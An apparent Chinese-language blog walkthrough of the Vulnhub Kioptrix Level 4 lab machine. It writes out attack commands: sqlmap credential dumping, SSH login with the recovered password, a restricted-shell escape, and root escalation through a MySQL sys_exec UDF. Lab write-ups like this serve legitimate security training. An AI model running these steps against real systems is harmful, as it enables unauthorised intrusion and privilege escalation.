Vulnhub系列-Kioptrix-Level-4

靶机:192.168.249.133
kali:192.168.249.132

一、信息收集

nmap -sV 192.168.249.133 —查看开放端口
Vulnhub系列-Kioptrix-Level-4_第1张图片
—查看下80端口—
Vulnhub系列-Kioptrix-Level-4_第2张图片
—是个登录框可能猜测sql注入漏洞—
—在用户名和密码处*标记,sqlmap跑一下
Vulnhub系列-Kioptrix-Level-4_第3张图片

sqlmap -r 1.txt --level 3 -risk 2 --batch -D members -T members -C password,username --dump—爆出用户名john密码MyNameIsJohn
Vulnhub系列-Kioptrix-Level-4_第4张图片
ssh [email protected]-----得到账号密码,先尝试ssh连接下
Vulnhub系列-Kioptrix-Level-4_第5张图片
----可以连接但发现很多命令没法执行—

二、逃逸受限shell

逃逸linux各种shell执行命令
echo os.system("/bin/bash") –echo命令逃逸受限shell
Vulnhub系列-Kioptrix-Level-4_第6张图片

三、权限提升(mysql udf提权)

uname -a –先查看下内核
请添加图片描述
–显然可以脏牛提权,但没有gcc—
cat /etc/passwd查看系统用户配置文件发现john和robert用户默认使用kshellVulnhub系列-Kioptrix-Level-4_第7张图片
ps -ef -查看下进程
请添加图片描述–发现mysql是root权限–

mysql -u root –root无密码即可登录

–学到了mysql udf提权Vulnhub系列-Kioptrix-Level-4_第8张图片
select * from func; –发现有执行命令函数
Vulnhub系列-Kioptrix-Level-4_第9张图片

—可以赋予john用户root权限

select sys_exec('usermod -a -G admin john'); –赋予权限
sudo su –输入john密码即拥有root权限
请添加图片描述

你可能感兴趣的:(Vulnhub系列,安全,linux,web安全)